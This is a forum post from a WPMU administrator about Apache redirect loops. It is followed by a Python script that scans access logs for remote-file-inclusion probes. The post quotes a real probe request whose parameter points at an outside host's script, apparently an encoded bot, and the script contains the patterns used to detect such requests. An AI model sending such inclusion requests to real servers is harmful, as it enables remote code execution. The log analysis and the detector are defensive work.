I'm running WPMU 1.3.3, and all seems to work well... Except that every once in a blue moon, Apache gets out of control. I just happened to catch it, and noticed the following:
[Wed Apr 16 00:57:39 2008] [error] [client 67.18.241.218] Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
Looking for that IP in access_log gives me the following:
67.18.241.218 - - [16/Apr/2008:00:57:39 -0400] "GET /inc/header.php/step_one.php?server_inc=http://blackid.org/do.bo?? HTTP/1.1" 500 603 "-" "libwww-perl/5.65"
(Among others)
The do.bo file is a script of some kind, potentially an IRC bot. (It encodes most of its payload. Since it's not actually getting run, I'm not going to take the time to wade through it.)
Has anyone seen this before? While they don't seem to be actually running their malicious code, it is causing a redirect loop. Has anyone seen this before? I've got a lot of additional RewriteRules, so I wanted to see if this was happening to anyone else (and it's thus a WPMU problem), or if it's just me (and it thus lies with my own mod_rewrite stuff). And in either case, I'm curious exactly what vulnerability they're trying to exploit. I'm surprised they're not getting a 404.
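The access_log entry quoted in the post has the shape of a remote file inclusion probe: a query parameter whose value is a remote URL, sent by a scripted client. The following triage script is an added example, not part of the original post; it assumes Apache's combined log format, and the function names, signal labels and the two contrast lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
REMOTE_URL = re.compile(r'(?:https?|ftp)://', re.I)  # parameter value is a remote URL
PATH_INFO = re.compile(r'\.php/', re.I)              # extra path after a .php script

SAMPLE = [
    # Line quoted from the post above.
    '67.18.241.218 - - [16/Apr/2008:00:57:39 -0400] "GET /inc/header.php/step_one.php'
    '?server_inc=http://blackid.org/do.bo?? HTTP/1.1" 500 603 "-" "libwww-perl/5.65"',
    # Constructed lines for contrast (documentation addresses, not real traffic).
    '192.0.2.10 - - [16/Apr/2008:00:58:02 -0400] "GET /wp-login.php?redirect_to=/wp-admin/'
    ' HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [16/Apr/2008:00:58:09 -0400] "GET /index.php/2008/04/hello/ HTTP/1.1"'
    ' 200 8841 "-" "Mozilla/5.0"',
]

def classify(line):
    """Parse one log line; return its signals, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    remote = [k for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if REMOTE_URL.match(v)]
    signals = []
    if remote:
        signals.append('remote-url-param')
    if PATH_INFO.search(parts.path):
        signals.append('php-path-info')
    if m['agent'].lower().startswith('libwww-perl'):
        signals.append('scripted-agent')
    return {'ip': m['ip'], 'status': int(m['status']), 'path': parts.path,
            'params': remote, 'signals': signals}

def probes(lines):
    """Group parameter names carrying a remote URL by client IP."""
    found = {}
    for hit in filter(None, map(classify, lines)):
        if 'remote-url-param' in hit['signals']:
            found.setdefault(hit['ip'], set()).update(hit['params'])
    return found

if __name__ == '__main__':
    for ip, names in probes(SAMPLE).items():
        print(ip, sorted(names))
```

Treat the signals as triage input rather than verdicts: legitimate redirect-style parameters can carry full URLs, and path segments after index.php are ordinary PATH_INFO permalinks.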